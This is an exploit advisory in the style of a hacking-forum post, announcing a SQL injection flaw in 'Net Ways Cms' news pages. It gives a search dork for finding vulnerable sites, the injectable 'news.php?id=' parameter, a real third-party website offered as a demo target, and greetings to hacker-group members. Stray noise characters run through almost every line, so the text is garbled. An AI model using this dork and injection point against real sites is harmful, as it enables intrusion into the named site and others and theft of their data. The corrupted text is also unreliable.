################################################################################??########
2 l2 w, y& F! m2 o; Y/ f+ s#
& ?' V q% K! j' ?( D# Exploit Title : Net Ways Cms Sql Injection Vulnerability 1 M* r1 F$ V! Q9 e, ?0 f
#
e M" t# U: Q: Y3 V# ~0 ^# Author : IrIsT.Ir # E8 _$ D3 j' v/ j* N7 ^' w1 I! J
# : C/ \9 F( j: p" h
# Discovered By : Am!r
4 E. f. [/ _0 w- a) W* |/ g8 L# # T2 }7 l! q) b, t- c% a
# Home : http://IrIsT.Ir/forum
( M. w! O, V: U# _2 p1 |0 {( l, t) z# ! M) p5 |1 ~4 r
# Software Link : http://www.netways.com/ www.political-security.com5 t# F. ^) l, X& C
#
/ \+ B) W2 G8 r: e n( ]1 g# Security Risk : High 0 M/ g' s. r" v% r1 U
#
9 q/ e$ C( ?5 P# Version : All Version
* M5 r& w3 [% H/ p6 T#
5 b, U- T0 A; \% O1 f: N. A0 |# Tested on : GNU/Linux Ubuntu - Windows Server - win7 7 ]# I+ w F/ ^- h# S9 H6 f
#
2 S/ J5 F% _/ s: R( L# Dork : intext:"Designed & developed by NetWays"
e; x o( F. `7 r3 `( i" H, i. q7 t+ Q# 3 w* N9 q9 m* Z3 L1 M) ?* j
################################################################################??########
$ n1 T& p |4 s" }# 4 m; f* r ]0 p- i: T
# Expl0iTs :
% M2 |7 K8 a" W0 Q#
% c/ n! b# J: N3 X2 G- D) v0 F# http://target.com/news.php?id=[Sql]
1 r& N, D$ F6 z p" H, {1 q#
+ n& K9 S( i+ H, q& R, ~- W8 c#
; C, ~; y% X% G8 i2 }# D3mo : + R d) e# a# t- q) b. G
#
d4 T# L; T+ n( U# http://compagnieparento.com/news.php?id=7[Sql]
" l# C# k4 u& A: _2 k5 J# ( Y! ?) b8 v! J' I. S2 U
################################################################################??######## + X u, r* e. ~2 s& T
# # q$ ^2 M2 K1 l9 R5 D9 w5 b
# Greats : B3HZ4D - nimaarek - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r
/ h1 f+ e1 d H8 T#
2 }$ ~& d" b5 D9 X$ P' C8 @* p# 0x0ptim0us - TaK.FaNaR - m3hdi - F@rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - d3c0d3r
6 W4 g$ E( j0 y/ |6 P8 I8 W# 5 ]! X8 H+ R3 G0 a7 O! J
# Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum 0 \) h$ W1 C, F# K
# 2 C& `& X! |1 B" l: e9 c: _
################################################################################??######## |